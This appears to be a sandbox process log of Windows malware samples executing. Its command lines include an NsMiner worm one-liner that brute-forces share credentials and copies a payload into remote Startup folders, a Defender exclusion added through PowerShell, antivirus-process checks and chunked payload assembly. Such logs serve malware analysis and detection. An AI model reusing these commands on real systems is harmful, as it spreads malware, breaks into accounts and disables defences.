C:\Users\Admin\Desktop\a\caspol.exe

"C:\Users\Admin\Desktop\a\caspol.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Users\Admin\Desktop\Files\WindowsUI.exe

"C:\Users\Admin\Desktop\Files\WindowsUI.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0205& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"

C:\Windows\SysWOW64\net.exe

net view

C:\Windows\SysWOW64\find.exe

find /i "\\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\caspol.exe"

C:\Users\Admin\Desktop\a\caspol.exe

"C:\Users\Admin\Desktop\a\caspol.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\gagagggagagag.exe

"C:\Users\Admin\Desktop\Files\gagagggagagag.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dk.cmd" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe

"C:\Users\Admin\Desktop\Files\build_2024-07-27_00-41.exe"

C:\Users\Admin\Desktop\Files\frap.exe

"C:\Users\Admin\Desktop\Files\frap.exe"

C:\Users\Admin\Desktop\Files\._cache_frap.exe

"C:\Users\Admin\Desktop\Files\._cache_frap.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 9600 -ip 9600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9600 -s 1468

C:\Users\Admin\Desktop\Files\main.exe

"C:\Users\Admin\Desktop\Files\main.exe"

C:\Users\Admin\Desktop\Files\main.exe

"C:\Users\Admin\Desktop\Files\main.exe"

C:\Windows\SysWOW64\ARP.EXE

arp -a

C:\Windows\SysWOW64\find.exe

find /i " 1"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c set str_

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net view \\136.243.76.21|find /i " "

C:\Windows\SysWOW64\net.exe

net view \\136.243.76.21

C:\Windows\SysWOW64\find.exe

find /i " "

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\findstr.exe

findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\system32\cmd.exe

cmd /c md 217412

C:\Windows\system32\findstr.exe

findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper

C:\Windows\system32\cmd.exe

cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

Possibly.pif N

C:\Windows\system32\choice.exe

choice /d y /t 5

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe

"C:\Users\Admin\AppData\Local\Temp\8yHfijNE.exe"

C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe

"C:\Users\Admin\AppData\Local\Temp\zcgb7ld2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\net.exe

net use * /delete /y

C:\Windows\SysWOW64\PING.EXE

ping -n 3 localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\C$\1\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\C$\1\IMG001.exe"

C:\Windows\SysWOW64\net.exe

net use \\136.243.76.21\C$ /delete /y

C:\Windows\SysWOW64\PING.EXE

ping -n 20 localhost

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\system32\cmd.exe

cmd /c md 29442

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

Reynolds.com l

C:\Windows\system32\choice.exe

choice /d y /t 5

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 580 -p 9288 -ip 9288

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 9288 -s 512

C:\Users\Admin\Desktop\Files\whiteheroin.exe

"C:\Users\Admin\Desktop\Files\whiteheroin.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\Desktop\Files\LummaC222222.exe

"C:\Users\Admin\Desktop\Files\LummaC222222.exe"

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com

C:\Users\Admin\Desktop\Files\install_lodop32.exe

"C:\Users\Admin\Desktop\Files\install_lodop32.exe"

C:\Users\Admin\Desktop\Files\Bluescreen.exe

"C:\Users\Admin\Desktop\Files\Bluescreen.exe"

C:\ProgramData\euoxkxg\cqibun.exe

"C:\ProgramData\euoxkxg\cqibun.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Users\Admin\Desktop\Files\LummaC2.exe

"C:\Users\Admin\Desktop\Files\LummaC2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Users\Admin\Desktop\Files\Sniffthem.exe

"C:\Users\Admin\Desktop\Files\Sniffthem.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo f"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\IMG001.exe" "

C:\Windows\SysWOW64\xcopy.exe

xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe"

C:\Windows\SysWOW64\net.exe

net use \\136.243.76.21\Users /delete /y

C:\Windows\SysWOW64\PING.EXE

ping -n 20 localhost

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 580 -p 2556 -ip 2556

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2556 -s 184

C:\Users\Admin\Desktop\Files\build2.exe

"C:\Users\Admin\Desktop\Files\build2.exe"

C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe

"C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe"

C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe"

